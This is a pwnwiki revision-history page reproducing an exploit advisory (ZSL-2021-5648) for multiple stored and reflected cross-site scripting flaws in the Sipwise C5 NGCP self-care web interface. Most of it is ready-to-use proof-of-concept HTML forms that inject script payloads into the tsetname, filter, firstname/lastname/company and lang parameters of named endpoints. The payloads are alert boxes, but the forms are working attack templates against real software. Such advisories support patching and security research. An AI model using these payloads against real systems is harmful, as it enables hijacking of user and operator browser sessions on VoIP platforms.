https://pwnwiki.com/index.php?action=history&feed=atom&title=Sipwise_C5_NGCP_CSC_XSS%E6%BC%8F%E6%B4%9E
Sipwise C5 NGCP CSC XSS漏洞 - Revision history
2026-04-07T19:59:37Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Sipwise_C5_NGCP_CSC_XSS%E6%BC%8F%E6%B4%9E&diff=1886&oldid=prev
Pwnwiki: 建立內容為「==XSS== <pre> # Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vend…」的新頁面
2021-04-24T01:34:46Z
<p>建立內容為「==XSS== <pre> # Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vend…」的新頁面</p>
<p><b>New page</b></p><div>==XSS==<br />
<pre><br />
# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)<br />
# Date: 13.04.2021<br />
# Exploit Author: LiquidWorm<br />
# Vendor Homepage: https://www.sipwise.com<br />
<br />
Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities<br />
<br />
<br />
Vendor: Sipwise GmbH<br />
Product web page: https://www.sipwise.com<br />
Affected version: <=CE_m39.3.1<br />
NGCP www_admin version 3.6.7<br />
<br />
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)<br />
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide<br />
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,<br />
conferencing etc.) that can be configured by end users in the self-care web interface.<br />
For operators, it offers a web-based administrative panel that allows them to configure<br />
subscribers, SIP peerings, billing profiles, and other entities. The administrative web<br />
panel also shows the real-time statistics for the whole system. For tight integration<br />
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.<br />
<br />
Desc: Sipwise software platform suffers from multiple authenticated stored and reflected<br />
cross-site scripting vulnerabilities when input passed via several parameters to several<br />
scripts is not properly sanitized before being returned to the user. This can be exploited<br />
to execute arbitrary HTML and script code in a user's browser session in context of an<br />
affected site.<br />
<br />
Tested on: Apache/2.2.22 (Debian)<br />
Apache/2.2.16 (Debian)<br />
nginx<br />
<br />
<br />
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />
@zeroscience<br />
<br />
<br />
Advisory ID: ZSL-2021-5648<br />
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php<br />
<br />
<br />
13.04.2021<br />
<br />
--<br />
<br />
<br />
Stored XSS (POST tsetname):<br />
---------------------------<br />
<br />
<html><br />
<body><br />
<form action="https://10.0.1.7/callforward/time/set/save" method="POST"><br />
<input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" /><br />
<input type="hidden" name="subscriber&#95;id" value="401" /><br />
<input type="hidden" name="x" value="90027" /><br />
<input type="hidden" name="y" value="&#45;1" /><br />
<input type="submit" value="Go for callforward" /><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
Reflected XSS (GET filter):<br />
---------------------------<br />
<br />
<html><br />
<body><br />
<form action="https://10.0.1.7/addressbook" method="GET"><br />
<input type="hidden" name="filter" value='"><script>confirm(251)</script>' /><br />
<input type="hidden" name="x" value="0" /><br />
<input type="hidden" name="y" value="0" /><br />
<input type="submit" value="Go for addressbook" /><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
Stored XSS (POST firstname, lastname, company):<br />
-----------------------------------------------<br />
<br />
<html><br />
<body><br />
<form action="https://10.0.1.7/addressbook/save" method="POST"><br />
<input type="hidden" name="firstname" value='"><script>alert(251)</script>' /><br />
<input type="hidden" name="lastname" value='"><script>alert(251)</script>' /><br />
<input type="hidden" name="company" value='"><script>alert(251)</script>' /><br />
<input type="hidden" name="homephonenumber" value="1112223333" /><br />
<input type="hidden" name="phonenumber" value="3332221111" /><br />
<input type="hidden" name="mobilenumber" value="" /><br />
<input type="hidden" name="faxnumber" value="" /><br />
<input type="hidden" name="email" value="lab%40zeroscience.mk" /><br />
<input type="hidden" name="homepage" value="" /><br />
<input type="hidden" name="id" value="" /><br />
<input type="hidden" name="x" value="89957" /><br />
<input type="hidden" name="y" value="21" /><br />
<input type="submit" value="Go for addressbook 2" /><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
Reflected XSS (GET lang):<br />
-------------------------<br />
<br />
<html><br />
<body><br />
<form action="https://10.0.1.7/statistics/versions" method="GET"><br />
<input type="hidden" name="lang" value="en'-alert(251)-'ZSL" /><br />
<input type="submit" value="Go for statistics" /><br />
</form><br />
</body><br />
</html><br />
</pre></div>
Pwnwiki